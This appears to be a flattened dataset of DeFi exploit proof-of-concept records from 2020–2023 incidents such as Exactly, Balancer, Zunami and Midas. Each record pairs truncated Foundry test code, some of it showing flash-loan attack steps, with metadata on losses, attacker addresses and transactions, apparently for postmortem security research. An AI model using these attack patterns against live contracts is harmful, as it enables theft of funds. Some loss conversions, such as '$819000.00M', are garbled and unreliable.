// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~286K USD$ // Attacker : https://etherscan.io/address/0xee4b3dd20902fa3539706f25005fa51d3b7bdf1b // Attack Contract : https://etherscan.io/address/0xfe141c32e36ba7601d12...
exploit_poc
EarningFram
2023-08
EarningFram_exp.sol
null
27eb0163e3bcf81d
2026-01-07T10:59:16.524210
postmortems
ethereum
17,875,885
~286K USD$
286,000
https://etherscan.io/address/0xee4b3dd20902fa3539706f25005fa51d3b7bdf1b
https://etherscan.io/address/0xfe141c32e36ba7601d128f0c39dedbe0f6abb983
https://etherscan.io/address/0x863e572b215fd67c855d973f870266cf827aea5e
https://etherscan.io/tx/0x6e6e556a5685980317cb2afdb628ed4a845b3cbd1c98bdaffd0561cb2c4790fa
null
https://twitter.com/Phalcon_xyz/status/1689182459269644288
true
true
false
high
~286K USD$
unknown
false
~286K USD$
https://etherscan.io/address/0xee4b3dd20902fa3539706f25005fa51d3b7bdf1b
https://etherscan.io/address/0xfe141c32e36ba7601d128f0c39dedbe0f6abb983
https://etherscan.io/address/0x863e572b215fd67c855d973f870266cf827aea5e
https://etherscan.io/tx/0x6e6e556a5685980317cb2afdb628ed4a845b3cbd1c98bdaffd0561cb2c4790fa
https://twitter.com/Phalcon_xyz/status/1689182459269644288
$286.0K
5.83
medium
EarningFram Exploit (2023-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~18ETH // Attacker : https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 // Attack Contract : https://etherscan.io/address/0xb7fbf984a50cd7c66e6da344...
exploit_poc
BTC20
2023-08
BTC20_exp.sol
flash_loan
84d8d9448a332a89
2026-01-07T10:59:16.524258
postmortems
ethereum
17,949,215
~18ETH
18
https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
https://etherscan.io/address/0xb7fbf984a50cd7c66e6da3448d68d9f3b7f24f33
null
https://etherscan.io/tx/0xcdd93e37ba2991ce02d8ca07bf6563bf5cd5ae801cbbce3dd0babb22e30b2dbe
null
https://twitter.com/DecurityHQ/status/1692924369662513472
true
true
true
low
~18ETH
flash-loan
false
~18ETH
https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
https://etherscan.io/address/0xb7fbf984a50cd7c66e6da3448d68d9f3b7f24f33
https://etherscan.io/tx/0xcdd93e37ba2991ce02d8ca07bf6563bf5cd5ae801cbbce3dd0babb22e30b2dbe
https://twitter.com/DecurityHQ/status/1692924369662513472
$18
7
medium
BTC20 Exploit (2023-08)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$7M USD$ // Attacker : https://optimistic.etherscan.io/address/0x3747dbbcb5c07786a4c59883e473a2e38f571af9 // Attack Contract : https://optimistic.etherscan.io/address/0...
exploit_poc
Exactly
2023-08
Exactly_exp.sol
null
ecdeb2de43e19205
2026-01-07T10:59:16.524362
postmortems
ethereum
108,375,557
~$7M USD$
7,000,000
https://optimistic.etherscan.io/address/0x3747dbbcb5c07786a4c59883e473a2e38f571af9
https://optimistic.etherscan.io/address/0x6dd61c69415c8ecab3fefd80d079435ead1a5b4d
https://optimistic.etherscan.io/address/0x16748cb753a68329ca2117a7647aa590317ebf41
https://optimistic.etherscan.io/tx/0x3d6367de5c191204b44b8a5cf975f257472087a9aadc59b5d744ffdef33a520e
https://medium.com/@exactly_protocol/exactly-protocol-incident-post-mortem-b4293d97e3ed
https://twitter.com/BlockSecTeam/status/1692533280971936059
true
true
false
critical
~$7M USD$
unknown
false
~$7M USD$
https://optimistic.etherscan.io/address/0x3747dbbcb5c07786a4c59883e473a2e38f571af9
https://optimistic.etherscan.io/address/0x6dd61c69415c8ecab3fefd80d079435ead1a5b4d
https://optimistic.etherscan.io/address/0x16748cb753a68329ca2117a7647aa590317ebf41
https://optimistic.etherscan.io/tx/0x3d6367de5c191204b44b8a5cf975f257472087a9aadc59b5d744ffdef33a520e
https://medium.com/@exactly_protocol/exactly-protocol-incident-post-mortem-b4293d97e3ed
https://twitter.com/BlockSecTeam/status/1692533280971936059
$7.00M
7
medium
Exactly Exploit (2023-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~630K USD$ // Attacker : https://basescan.org/address/0x705f736145bb9d4a4a186f4595907b60815085c3 // Attack Contract : https://basescan.org/address/0xea8f89f47f3d4293897b...
exploit_poc
Leetswap
2023-08
Leetswap_exp.sol
null
adb04efd7d54852f
2026-01-07T10:59:16.524474
postmortems
base
2,031,746
~630K USD$
630,000
https://basescan.org/address/0x705f736145bb9d4a4a186f4595907b60815085c3
https://basescan.org/address/0xea8f89f47f3d4293897b4fe8cb69b5c233b9f560
https://basescan.org/address/0x94dac4a3ce998143aa119c05460731da80ad90cf
https://basescan.org/tx/0xbb837d417b76dd237b4418e1695a50941a69259a1c4dee561ea57d982b9f10ec
null
https://twitter.com/BlockSecTeam/status/1686217464051539968
true
true
false
high
~630K USD$
unknown
false
~630K USD$
https://basescan.org/address/0x705f736145bb9d4a4a186f4595907b60815085c3
https://basescan.org/address/0xea8f89f47f3d4293897b4fe8cb69b5c233b9f560
https://basescan.org/address/0x94dac4a3ce998143aa119c05460731da80ad90cf
https://basescan.org/tx/0xbb837d417b76dd237b4418e1695a50941a69259a1c4dee561ea57d982b9f10ec
https://twitter.com/BlockSecTeam/status/1686217464051539968
$630.0K
5.3
medium
Leetswap Exploit (2023-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/console.sol"; import "forge-std/Test.sol"; import "../test/../interface.sol"; // @KeyInfo - Total Lost : ~2M // Attacker : https://etherscan.io/address/0xed187f37e5ad87d5b3b2624c01de56c5862b7a9b // Attack Contract : https://etherscan.io...
exploit_poc
Balancer
2023-08
Balancer_exp.sol
flash_loan
a7fbe74733396115
2026-01-07T10:59:16.524521
postmortems
ethereum
18,004,651
~2M
2,000,000
https://etherscan.io/address/0xed187f37e5ad87d5b3b2624c01de56c5862b7a9b
https://etherscan.io/address/0x2100dcd8758ab8b89b9b545a43a1e47e8e2944f0
https://etherscan.io/address/0x9210f1204b5a24742eba12f710636d76240df3d0
https://etherscan.io/tx/0x2a027c8b915c3737942f512fc5d26fd15752d0332353b3059de771a35a606c2d
https://blocksecteam.medium.com/yet-another-risk-posed-by-precision-loss-an-in-depth-analysis-of-the-recent-balancer-incident-fad93a3c75d4
https://twitter.com/wavey0x/status/1702311454689357851
true
true
true
critical
~2M
flash-loan
function testExploit() public { address[] memory assets = new address[](1); assets[0] = address(USDC); uint256[] memory amounts = new uint256[](1); amounts[0] = 300_000 * 1e6; uint256[] memory interestRateModes = new uint256[](2); interestRateModes[0] = 0; interes...
true
~2M
https://etherscan.io/address/0xed187f37e5ad87d5b3b2624c01de56c5862b7a9b
https://etherscan.io/address/0x2100dcd8758ab8b89b9b545a43a1e47e8e2944f0
https://etherscan.io/address/0x9210f1204b5a24742eba12f710636d76240df3d0
https://etherscan.io/tx/0x2a027c8b915c3737942f512fc5d26fd15752d0332353b3059de771a35a606c2d
https://blocksecteam.medium.com/yet-another-risk-posed-by-precision-loss-an-in-depth-analysis-of-the-recent-balancer-incident-fad93a3c75d4
https://twitter.com/wavey0x/status/1702311454689357851
$2.00M
10
high
Balancer Exploit (2023-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/Phalcon_xyz/status/1695285435671392504?s=20 // @TX // https://bscscan.com/tx/0xf2a0c957fef493af44f55b201fbc6d82db2e4a045c5c856bfe3d8cb80fa30c12 interface ISVTp...
exploit_poc
SVT
2023-08
SVT_exp.sol
flash_loan
d7374028e8775465
2026-01-07T10:59:16.524586
postmortems
bsc
31,178,238
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { BUSD.approve(address(pool), type(uint256).max); SVT.approve(address(pool), type(uint256).max); uint256 flash_amount = BUSD.balanceOf(dodo); DVM(dodo).flashLoan(0, flash_amount, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attac...
true
Unknown
3.99
low
SVT Exploit (2023-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$24883 USD$ // Attacker : https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d // Attack Contract : https://bscscan.com/address/0x69ed5b59d977695650ec...
exploit_poc
GSS
2023-08
GSS_exp.sol
flash_loan
449cb644d3e0128a
2026-01-07T10:59:16.524624
postmortems
bsc
31,108,559
~$24883 USD$
24,883
https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d
https://bscscan.com/address/0x69ed5b59d977695650ec4b29e61c0faa8cc0ed5c
null
https://bscscan.com/tx/0x4f8cb9efb3cc9930bd38af5f5d34d15ce683111599a80df7ae50b003e746e336
null
https://twitter.com/bbbb/status/1694571228185723099
true
true
true
medium
~$24883 USD$
flash-loan
function testExploit() public { IDPPOracle(dodo_pool).flashLoan(0, 30_000 ether, address(this), new bytes(1)); }
true
~$24883 USD$
https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d
https://bscscan.com/address/0x69ed5b59d977695650ec4b29e61c0faa8cc0ed5c
https://bscscan.com/tx/0x4f8cb9efb3cc9930bd38af5f5d34d15ce683111599a80df7ae50b003e746e336
https://twitter.com/bbbb/status/1694571228185723099
$24.9K
7.34
medium
GSS Exploit (2023-08)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$15K // Attacker : https://etherscan.io/address/0x0195448a9c4adeaf27002c6051c949f3c3234bb5 // Attacker Contract : https://etherscan.io/address/0x98c2e1e85f8bf737d9c1450...
exploit_poc
EHIVE
2023-08
EHIVE_exp.sol
flash_loan
44a56c40cf2726f3
2026-01-07T10:59:16.524669
postmortems
ethereum
17,690,497
~$15K
15,000
https://etherscan.io/address/0x0195448a9c4adeaf27002c6051c949f3c3234bb5
null
https://etherscan.io/address/0x4ae2cd1f5b8806a973953b76f9ce6d5fab9cdcfd
https://etherscan.io/tx/0xad818ec910def08c70ac519ab0fffa084b4178014a91cd8aa2f882d972a511c1
null
null
true
true
true
medium
~$15K
flash-loan
function testExploit() public { // 1. Deploy exploit contract // 2. Call EHIVE stake function with amount 0 for (uint256 i; i < contractList.length; ++i) { address deployedContract = address(new UnstakeContract()); IUnstake(deployedContract).stake(0); contract...
true
~$15K
https://etherscan.io/address/0x0195448a9c4adeaf27002c6051c949f3c3234bb5
https://etherscan.io/address/0x4ae2cd1f5b8806a973953b76f9ce6d5fab9cdcfd
https://etherscan.io/tx/0xad818ec910def08c70ac519ab0fffa084b4178014a91cd8aa2f882d972a511c1
$15.0K
9.79
high
EHIVE Exploit (2023-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~2M USD$ // Attacker : https://etherscan.io/address/0x5f4c21c9bb73c8b4a296cc256c0cde324db146df // Attack Contract : https://etherscan.io/address/0xa21a2b59d80dc42d332f77...
exploit_poc
Zunami
2023-08
Zunami_exp.sol
flash_loan
0304427608057b20
2026-01-07T10:59:16.524727
postmortems
ethereum
17,908,949
~2M USD$
2,000,000
https://etherscan.io/address/0x5f4c21c9bb73c8b4a296cc256c0cde324db146df
https://etherscan.io/address/0xa21a2b59d80dc42d332f778cbb9ea127100e5d75
https://etherscan.io/address/0xb40b6608b2743e691c9b54ddbdee7bf03cd79f1c
https://etherscan.io/tx/0x0788ba222970c7c68a738b0e08fb197e669e61f9b226ceec4cab9b85abe8cceb
null
https://twitter.com/peckshield/status/1690877589005778945
true
true
true
critical
~2M USD$
flash-loan
false
~2M USD$
https://etherscan.io/address/0x5f4c21c9bb73c8b4a296cc256c0cde324db146df
https://etherscan.io/address/0xa21a2b59d80dc42d332f778cbb9ea127100e5d75
https://etherscan.io/address/0xb40b6608b2743e691c9b54ddbdee7bf03cd79f1c
https://etherscan.io/tx/0x0788ba222970c7c68a738b0e08fb197e669e61f9b226ceec4cab9b85abe8cceb
https://twitter.com/peckshield/status/1690877589005778945
$2.00M
8
high
Zunami Exploit (2023-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~176 ETH // Attacker : https://etherscan.io/address/0x6057a831d43c395198a10cf2d7d6d6a063b1fce4 // Attack Contract : https://etherscan.io/address/0xda2ccfc4557ba55eada3cb...
exploit_poc
Uwerx
2023-08
Uwerx_exp.sol
null
b8b5543e70a0e113
2026-01-07T10:59:16.524798
postmortems
ethereum
17,826,202
~176 ETH
176
https://etherscan.io/address/0x6057a831d43c395198a10cf2d7d6d6a063b1fce4
https://etherscan.io/address/0xda2ccfc4557ba55eada3cbebd0aeffcf97fc14ca
https://etherscan.io/token/0x4306b12f8e824ce1fa9604bbd88f2ad4f0fe3c54
https://etherscan.io/tx/0x3b19e152943f31fe0830b67315ddc89be9a066dc89174256e17bc8c2d35b5af8
null
https://twitter.com/deeberiroz/status/1686683788795846657
true
true
false
low
~176 ETH
unknown
false
~176 ETH
https://etherscan.io/address/0x6057a831d43c395198a10cf2d7d6d6a063b1fce4
https://etherscan.io/address/0xda2ccfc4557ba55eada3cbebd0aeffcf97fc14ca
https://etherscan.io/token/0x4306b12f8e824ce1fa9604bbd88f2ad4f0fe3c54
https://etherscan.io/tx/0x3b19e152943f31fe0830b67315ddc89be9a066dc89174256e17bc8c2d35b5af8
https://twitter.com/deeberiroz/status/1686683788795846657
$176
5.35
medium
Uwerx Exploit (2023-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.19; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/phalcon_xyz/status/1686654241111429120?s=46&t=Oc_WAGUoXqc9c0LidD-zww // @TX // https://explorer.phalcon.xyz/tx/arbitrum/0x6301d4c9f7ac1c96a65e83be6ea2fff5000f0b...
exploit_poc
NeutraFinance
2023-08
NeutraFinance_exp.sol
flash_loan
bcc9cc49052e4dff
2026-01-07T10:59:16.524848
postmortems
unknown
117,189,138
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function test() public { console.log("Attacker's WETH token balance: ", WETH.balanceOf(address(this))); IERC20[] memory tokens = new IERC20[](1); uint256[] memory amount = new uint256[](1); tokens[0] = WETH; amount[0] = 1000 ether; bytes memory userdata; valut.fla...
true
Unknown
6
medium
NeutraFinance Exploit (2023-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$36k USD$ // Attacker : https://etherscan.io/address/0xccc526e2433db1eebb9cbf6acd7f03a19408278c // Attack Contract : https://etherscan.io/address/0x915dff6707bea63daea1...
exploit_poc
CurveBurner
2023-08
CurveBurner_exp.sol
flash_loan
ee2297a0c0d9287e
2026-01-07T10:59:16.524935
postmortems
ethereum
17,823,542
~$36k USD$
36,000
https://etherscan.io/address/0xccc526e2433db1eebb9cbf6acd7f03a19408278c
https://etherscan.io/address/0x915dff6707bea63daea1b41aa5d37353229066ba
https://etherscan.io/address/0x786b374b5eef874279f4b7b4de16940e57301a58
https://etherscan.io/tx/0xd493c73397952049644c531309df3dd4134bf3db1e64eb6f0b68b016ee0bffde
https://medium.com/@Hypernative/exotic-culinary-hypernative-systems-caught-a-unique-sandwich-attack-against-curve-finance-6d58c32e436b
null
true
true
true
medium
~$36k USD$
flash-loan
false
~$36k USD$
https://etherscan.io/address/0xccc526e2433db1eebb9cbf6acd7f03a19408278c
https://etherscan.io/address/0x915dff6707bea63daea1b41aa5d37353229066ba
https://etherscan.io/address/0x786b374b5eef874279f4b7b4de16940e57301a58
https://etherscan.io/tx/0xd493c73397952049644c531309df3dd4134bf3db1e64eb6f0b68b016ee0bffde
https://medium.com/@Hypernative/exotic-culinary-hypernative-systems-caught-a-unique-sandwich-attack-against-curve-finance-6d58c32e436b
$36.0K
8
high
CurveBurner Exploit (2023-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1613267000913960976 // @TX // https://etherscan.io/tx/0x927b784148b60d5233e57287671cdf67d38e3e69e5b6d0ecacc7c1aeaa98985b interface ROE { ...
exploit_poc
RoeFinance
2023-01
RoeFinance_exp.sol
flash_loan
3977b2918bfbc45e
2026-01-07T10:59:16.524995
postmortems
ethereum
16,384,469
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
2.96
low
RoeFinance Exploit (2023-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "forge-std/console2.sol"; import "forge-std/Test.sol"; import "./../interface.sol"; // Total Lost: ~22 ETH // Attacker: 0xceed34f03a3e607cc04c2d0441c7386b190d7cf4 // Attack Contract: 0x762d2a9f065304d42289f3f13cc8ea23226d3b8c // Vulnerable Contract...
exploit_poc
Upswing
2023-01
Upswing_exp.sol
null
7090fd9c69573560
2026-01-07T10:59:16.525044
postmortems
ethereum
16,433,820
~22 ETH
22
null
null
null
https://etherscan.io/tx/0x4b3df6e9c68ae482c71a02832f7f599ff58ff877ec05fed0abd95b31d2d7d912
null
null
false
true
false
low
~22 ETH
unknown
function testExploit() public { // sample attack with 1 ether deal(weth, address(this), 1 ether); address[] memory path = new address[](2); path[0] = weth; path[1] = upsToken; IERC20(weth).approve(address(uniRouter), type(uint256).max); uniRouter.swapExactTokens...
true
https://etherscan.io/tx/0x4b3df6e9c68ae482c71a02832f7f599ff58ff877ec05fed0abd95b31d2d7d912
$22
6.39
medium
Upswing Exploit (2023-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 819 BNB (~224K US$) // Attacker : 0x67a909f2953fb1138bea4b60894b51291d2d0795 // Vulnerable Contract : 0x449fea37d339a11efe1b181e5d5462464bba3752 // @Info // Attack Cont...
exploit_poc
BRA
2023-01
BRA_exp.sol
flash_loan
4755dc6cd637724a
2026-01-07T10:59:16.525093
postmortems
bsc
24,655,771
819 BNB (~224K US$)
819,000,000,000
null
null
null
null
null
null
true
true
true
critical
819 BNB (~224K US$)
flash-loan
function testExploit() public { emit log_named_decimal_uint("[Before Attacks] Attacker WBNB balance", wbnb.balanceOf(address(this)), 18); exploit.go(); emit log_named_decimal_uint("[After Attacks] Attacker WBNB balance", wbnb.balanceOf(address(this)), 18); } } contract Exploit is Test { ...
true
819 BNB (~224K US$)
$819000.00M
8
high
BRA Exploit (2023-01)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1615232012834705408 // @TX // invest // https://bscscan.com/tx/0x49bed801b9a9432728b1939951acaa8f2e874453d39c7d881a62c2c157aa7613 // withdra...
exploit_poc
OmniEstate
2023-01
OmniEstate_exp.sol
null
36158a2c89eaf969
2026-01-07T10:59:16.525166
postmortems
bsc
24,850,696
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { // 1. get some ort token IWBNB(WBNB).deposit{value: 1e18}(); emit log_named_decimal_uint("[Before Attacks] Attacker WBNB balance", WBNB.balanceOf(address(this)), 18); bscSwap(address(WBNB), ORT, 1e18); // 2. invest IERC20(ORT).approve(Omni,...
true
Unknown
3.14
low
OmniEstate Exploit (2023-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1610095490368180224 // https://twitter.com/BlockSecTeam/status/1610167174978760704 // @TX // https://bscscan.com/tx/0xf9b6cc083f6e0e41ce5e5dd6...
exploit_poc
GDS
2023-01
GDS_exp.sol
flash_loan
9482e4fae1ad362c
2026-01-07T10:59:16.525208
postmortems
bsc
24,449,918
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { address(WBNB).call{value: 50 ether}(""); WBNBToUSDT(); USDTToGDS(10 * 1e18); GDSUSDTAddLiquidity(10 * 1e18, GDS.balanceOf(address(this))); USDTToGDS(USDT.balanceOf(address(this))); PerContractGDSAmount = GDS.balanceOf(address(this)) / 100; ...
true
Unknown
6
medium
GDS Exploit (2023-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; // Total lost: 22 ETH // Attacker: 0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195 // Attack Contract: 0xdb2d869ac23715af204093e933f5eb57f2dc12a9 // Vulnerable Contract: 0x2d0e64b6bf13660a4c0de42a0b88144a7c10991f // Attack Tx: htt...
exploit_poc
TINU
2023-01
TINU_exp.sol
flash_loan
d5594f9270de2b2f
2026-01-07T10:59:16.525265
postmortems
ethereum
16,489,408
22 ETH
22
null
null
null
https://phalcon.blocksec.com/tx/eth/0x6200bf5c43c214caa1177c3676293442059b4f39eb5dbae6cfd4e6ad16305668
null
null
false
true
true
low
22 ETH
flash-loan
false
https://phalcon.blocksec.com/tx/eth/0x6200bf5c43c214caa1177c3676293442059b4f39eb5dbae6cfd4e6ad16305668
$22
6.57
medium
TINU Exploit (2023-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~4 ETH // Original Attacker: https://etherscan.io/address/0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195 // Frontrunner: https://etherscan.io/address/0xe71aca93c0e0721f8250d...
exploit_poc
SHOCO
2023-01
SHOCO_exp.sol
null
b14adc24c4d28773
2026-01-07T10:59:16.525325
postmortems
ethereum
null
~4 ETH
4
https://etherscan.io/address/0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195
https://etherscan.io/address/0x15d684b4ecdc0ece8bc9aec6bce3398a9a4c7611
https://etherscan.io/address/0x31a4f372aa891b46ba44dc64be1d8947c889e9c6
https://etherscan.io/tx/0x2e832f044b4a0a0b8d38166fe4d781ab330b05b9efa9e72a7a0895f1b984084b
null
null
true
true
false
low
~4 ETH
unknown
false
~4 ETH
https://etherscan.io/address/0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195
https://etherscan.io/address/0x15d684b4ecdc0ece8bc9aec6bce3398a9a4c7611
https://etherscan.io/address/0x31a4f372aa891b46ba44dc64be1d8947c889e9c6
https://etherscan.io/tx/0x2e832f044b4a0a0b8d38166fe4d781ab330b05b9efa9e72a7a0895f1b984084b
$4
6.28
medium
SHOCO Exploit (2023-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1615625901739511809 // @TX // https://etherscan.io/tx/0x37cb8626e45f0749296ef080acb218e5ccc7efb2ae4d39c952566dc378ca1c4c // https://ethersca...
exploit_poc
QTN
2023-01
QTN_exp.sol
null
71e5acaebc0939b7
2026-01-07T10:59:16.525379
postmortems
ethereum
16,430,212
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { address(WETH).call{value: 2 ether}(""); WETHToQTN(); cheats.warp(block.timestamp + 500); // _timeLimitFromLastBuy 5 minutes QTNContractFactory(); cheats.warp(block.timestamp + 500); QTNContractBack(); QTNToWETH(); emit log_...
true
Unknown
3.55
low
QTN Exploit (2023-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Total lost: 144 BNB // Frontrunner: https://bscscan.com/address/0xd3455773c44bf0809e2aeff140e029c632985c50 // Original Attacker: https://bscscan.com/address/0x68fa774685154d3d22dec195bc77d53f02...
exploit_poc
BEVO
2023-01
BEVO_exp.sol
flash_loan
776d6a4d630b8e5e
2026-01-07T10:59:16.525420
postmortems
bsc
25,230,702
144 BNB
144,000,000,000
https://bscscan.com/address/0x68fa774685154d3d22dec195bc77d53f0261f9fd
https://bscscan.com/address/0xbf7fc9e12bcd08ec7ef48377f2d20939e3b4845d
https://bscscan.com/address/0xc6cb12df4520b7bf83f64c79c585b8462e18b6aa
https://bscscan.com/tx/0xb97502d3976322714c828a890857e776f25c79f187a32e2d548dda1c315d2a7d
null
null
false
true
true
critical
144 BNB
flash-loan
false
https://bscscan.com/address/0x68fa774685154d3d22dec195bc77d53f0261f9fd
https://bscscan.com/address/0xbf7fc9e12bcd08ec7ef48377f2d20939e3b4845d
https://bscscan.com/address/0xc6cb12df4520b7bf83f64c79c585b8462e18b6aa
https://bscscan.com/tx/0xb97502d3976322714c828a890857e776f25c79f187a32e2d548dda1c315d2a7d
$144000.00M
6.66
medium
BEVO Exploit (2023-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1613507804412940289 // @TX // https://bscscan.com/tx/0x933d19d7d822e84e34ca47ac733226367fbee0d9c0c89d88d431c4f99629d77a interface SHOP { ...
exploit_poc
UFDao
2023-01
UFDao_exp.sol
null
91d6b4397b32fabb
2026-01-07T10:59:16.525467
postmortems
bsc
24,705,058
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.2
low
UFDao Exploit (2023-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1614774855999844352 // https://twitter.com/BlockSecTeam/status/1614864084956254209 // @TX // https://polygonscan.com/tx/0x0053490215baf541362f...
exploit_poc
Midas
2023-01
Midas_exp.sol
flash_loan
92294ad3861d053f
2026-01-07T10:59:16.525516
postmortems
polygon
38,118,347
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { payable(address(0)).transfer(address(this).balance); balancerFlashloan(); emit log_named_decimal_uint( "Attacker WMATIC balance after exploit", WMATIC.balanceOf(address(this)), WMATIC.decimals() ); }
true
Unknown
6
medium
Midas Exploit (2023-01)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~2000 BNB (6 BNB in this tx) // Attacker : 0x1ae2dc57399b2f4597366c5bf4fe39859c006f99 // Attack Contract : 0x7d1e1901226e0ba389bfb1281ede859e6e48cc3d // Vulnerable Contr...
exploit_poc
ThoreumFinance
2023-01
ThoreumFinance_exp.sol
null
872c597623a26c94
2026-01-07T10:59:16.525607
postmortems
bsc
24,913,171
~2000 BNB (6 BNB in this tx)
2,000,000,000,000
null
null
null
https://bscscan.com/tx/0x3fe3a1883f0ae263a260f7d3e9b462468f4f83c2c88bb89d1dee5d7d24262b51
null
null
true
true
false
critical
~2000 BNB (6 BNB in this tx)
unknown
function testExploit() public { Exploit exploit = new Exploit(); emit log_named_decimal_uint("[start] Attacker wbnb Balance", wbnb.balanceOf(exploiter), 18); exploit.harvest(); emit log_named_decimal_uint("[End] Attacker wbnb Balance", wbnb.balanceOf(exploiter), 18); } } contract Ex...
true
~2000 BNB (6 BNB in this tx)
https://bscscan.com/tx/0x3fe3a1883f0ae263a260f7d3e9b462468f4f83c2c88bb89d1dee5d7d24262b51
$2000000.00M
7.05
medium
ThoreumFinance Exploit (2023-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "forge-std/console2.sol"; import "forge-std/Test.sol"; import "../interface.sol"; /* Balancer STA Exploit Vulnerability principle: The incompatibility issue of deflationary tokens(STA) on Balancer. When users exchange deflationary tokens, the cont...
exploit_poc
Balancer_20200628
2020-06
Balancer_20200628_exp.sol
null
7d457345b708c609
2026-01-07T10:59:16.525677
postmortems
ethereum
10,355,806
null
null
null
null
null
https://etherscan.io/tx/0x013be97768b702fe8eccef1a40544d5ecb3c1961ad5f87fee4d16fdc08c78106
null
null
false
false
false
medium
null
unknown
function testExploit() public { // approve IERC20(weth).approve(dydx, type(uint256).max); IERC20(weth).approve(address(bpool), type(uint256).max); IERC20(sta).approve(address(bpool), type(uint256).max); IERC20(sta).approve(pancakeV2Router, type(uint256).max); emit log_na...
true
https://etherscan.io/tx/0x013be97768b702fe8eccef1a40544d5ecb3c1961ad5f87fee4d16fdc08c78106
Unknown
7
medium
Balancer_20200628 Exploit (2020-06)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Bancor Protocol Access Control Exploit PoC Some of the newly deployed Bancor contracts had the 'safeTransferFrom' function public. As a result, if any user had granted approval to these contra...
exploit_poc
Bancor
2020-06
Bancor_exp.sol
access_control
abd6e7917494f4fc
